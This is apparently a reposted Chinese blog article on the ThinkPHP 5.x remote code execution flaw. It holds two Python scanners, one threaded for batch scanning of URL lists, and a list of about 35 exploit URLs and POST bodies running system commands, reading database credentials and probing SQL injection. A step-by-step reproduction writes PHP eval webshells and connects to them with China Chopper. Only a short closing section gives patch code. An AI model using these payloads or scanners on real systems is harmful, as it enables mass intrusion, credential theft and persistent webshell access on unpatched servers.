當前位置：首頁 > 编程语言 > php >内容正文

php

Thinkphp V5.X 远程代码执行漏洞 - POC（精：集群5.0、5.1、5.2*）

發布時間：2025/3/15 php 26 豆豆

生活随笔收集整理的這篇文章主要介紹了 Thinkphp V5.X 远程代码执行漏洞 - POC（精：集群5.0*、5.1*、5.2*）小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

thinkphp-RCE-POC

官方公告:
1、https://blog.thinkphp.cn/869075
2、https://blog.thinkphp.cn/910675

POC：

批量檢測

#!/usr/bin/env python # -*- coding: utf-8 -*- ''' name: thinkphp遠程代碼檢測 description: ThinkPHP5 5.0.22/5.1.29 遠程代碼執行漏洞 '''import re import sys import requests import queue import threading from bs4 import BeautifulSoup class thinkphp_rce(threading.Thread):def __init__(self, q):threading.Thread.__init__(self)self.q = qdef run(self):while not self.q.empty():url=self.q.get()headers = {"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"}payload = r"/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"vulnurl = url + payloadtry:response = requests.get(vulnurl, headers=headers, timeout=3, verify=False, allow_redirects=False)soup = BeautifulSoup(response.text,"lxml")if 'PHP Version' in str(soup.text):print ('[+] Remote code execution vulnerability exists at the target address')print ('[+] Vulnerability url address ' + vulnurl)with open('target.txt','a') as f1:f1.write(vulnurl+'\n')f1.close()else:print ('[-] There is no remote code execution vulnerability in the target address')except:print ('[!] Destination address cannot be connected') def urlget():with open('url.txt','r')as f:urls=f.readlines()for tmp in urls:if '//' in tmp:url=tmp.strip('\n')urlList.append(url)else:url='http://'+tmp.strip('\n')urlList.append(url)return(urlList)f.close()if __name__=="__main__":print('''----------------掃描開始-------------------*Made by :tdcoming *For More :https://t.zsxq.com/Ai2rj6E *MY Heart :https://t.zsxq.com/A2FQFMN_______ _ _ |__ __| | | (_) | | __| | ___ ___ _ __ ___ _ _ __ __ _| | / _` | / __|/ _ \ | '_ ` _ \ | || '_ \ / _` || || (_| || (__| (_) || | | | | || || | | || (_| ||_| \__,_| \___|\___/ |_| |_| |_||_||_| |_| \__, |__/ ||___/''')urlList=[]urlget()threads = []threads_count = 10q=queue.Queue()for url in urlList:q.put(url)for i in range(threads_count):threads.append(thinkphp_rce(q))for i in threads:i.start()for i in threads:i.join()

單個檢測

#!/usr/bin/env python # -*- coding: utf-8 -*- ''' name: thinkphp遠程代碼檢測 description: ThinkPHP5 5.0.22/5.1.29 遠程代碼執行漏洞 '''import sys import requests from bs4 import BeautifulSoupclass thinkphp_rce(object):def __init__(self):passdef run(self, url):headers = {"User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"}payloads = [r"/thinkphp/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",r"/thinkphp_5.0.22/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",r"/thinkphp5.0.22/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",r"/thinkphp5.1.29/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",r"/thinkphp_5.1.29/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"]for payload in payloads:vulnurl = url + payloadtry:response = requests.get(vulnurl, headers=headers, timeout=3, verify=False, allow_redirects=False)soup = BeautifulSoup(response.text, "lxml")if 'PHP Version' in str(soup.text):print('[+] Remote code execution vulnerability exists at the target address')print('[+] Vulnerability url address ' + vulnurl)breakelse:print('[-] There is no remote code execution vulnerability in the target address')except Exception as e:print('[!] Destination address cannot be connected')print(str(e))if __name__ == "__main__":print('''----------------掃描開始-------------------*Made by :tdcoming *For More :https://t.zsxq.com/Ai2rj6E *MY Heart :https://t.zsxq.com/A2FQFMN_______ _ _ |__ __| | | (_) | | __| | ___ ___ _ __ ___ _ _ __ __ _| | / _` | / __|/ _ \ | '_ ` _ \ | || '_ \ / _` || || (_| || (__| (_) || | | | | || || | | || (_| ||_| \__,_| \___|\___/ |_| |_| |_||_||_| |_| \__, |__/ ||___/''')#if len(sys.argv) != 2:# sys.exit("\n [+] Usage: python %s http://x.x.x.x\n" % sys.argv[0])#url = sys.argv[1]url = "http://127.0.0.1"thinkphp_rce().run(url)

thinkphp 5.0.22

1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
3、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
4、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5

5、http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

thinkphp 5.0.21

6、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
7、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5.1.*

8、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
9、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
10、http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
11、http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
12、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
13、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
14、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
15、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd

未知版本

16、?s=index/\think\module/action/param1/${@phpinfo()}
17、?s=index/\think\Module/Action/Param/${@phpinfo()}
18、?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
19、index.php?s=/home/article/view_recent/name/1'
header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
20、index.php?s=/home/shopcart/getPricetotal/tag/1%27
21、index.php?s=/home/shopcart/getpriceNum/id/1%27
22、index.php?s=/home/user/cut/id/1%27
23、index.php?s=/home/service/index/id/1%27
24、index.php?s=/home/pay/chongzhi/orderid/1%27
25、index.php?s=/home/pay/index/orderid/1%27
26、index.php?s=/home/order/complete/id/1%27
27、index.php?s=/home/order/complete/id/1%27
28、index.php?s=/home/order/detail/id/1%27
29、index.php?s=/home/order/cancel/id/1%27
30、index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
31、POST /index.php?s=/home/user/checkcode/ HTTP/1.1
Content-Disposition: form-data; name="couponid"
1') union select sleep('''+str(sleep_time)+''')#

thinkphp 5.0.23（完整版）debug模式

32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx

thinkphp 5.0.23(完整版)

33、（post）public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

thinkphp 5.0.10（完整版）

34、(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system

thinkphp 5.1.* 和 5.2.* 和 5.0.*

35、(post)public/index.php (data)c=exec&f=calc.exe&_method=filter

最后提一句 TP6 有可能有任意文件上傳漏洞。

一、漏洞描述

2018年12月10日,ThinkPHP官方發布了安全更新,其中修復了ThinkPHP5框架的一個高危漏洞: https://blog.thinkphp.cn/869075

漏洞的原因是由于框架對控制器名沒有進行足夠的檢測,導致在沒有開啟強制路由(默認未開啟)的情況下可能導致遠程代碼執行,受影響的版本包括5.0和5.1。

二、漏洞影響版本

Thinkphp 5.x-Thinkphp 5.1.31

Thinkphp 5.0.x<=5.0.23

三、漏洞復現

1、官網下載Thinkphp 5.0.22,下載地址:?http://www.thinkphp.cn/donate/download/id/1260.html

2、使用phpstudy搭建環境,解壓下載的Thinkphp5.0.22到網站目錄下,瀏覽器訪問http://192.168.10.171/thinkphp5.0.22/public

3、利用system函數遠程命令執行

Payload如下:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

4、通過phpinfo函數查看phpinfo()的信息　

Payload如下:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

5、寫入shell

Payload如下:

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >shell.php

注意:需要對特殊字符使用^轉義(cmd環境下轉義方式),windows環境的echo命令輸出字符串到文檔不用引號(單引號、雙引號),部分字符url編碼不編碼都行。

?6、查看是否成功寫入shell

7、菜刀連接

8、第二種的寫入shell的方法

Payload如下:

??s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php @eval($_POST[test]);?>

9、查看是否成功寫入文件

10、菜刀連接

修復Thinkphp框架5.0和5.1版本的遠程代碼執行安全漏洞

5.0版本

thinkphp/library/think/App.php? 類的module方法的獲取控制器的代碼后面加上

if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {throw new HttpException(404, 'controller not exists:' . $controller);}

5.1版本

thinkphp/library/think/route/dispatch/Url.php? 類的parseUrl方法，解析控制器后加上?? 添加

?if ($controller && !preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {throw new HttpException(404, 'controller not exists:' . $controller);}

總結

以上是生活随笔為你收集整理的Thinkphp V5.X 远程代码执行漏洞 - POC（精：集群5.0*、5.1*、5.2*）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。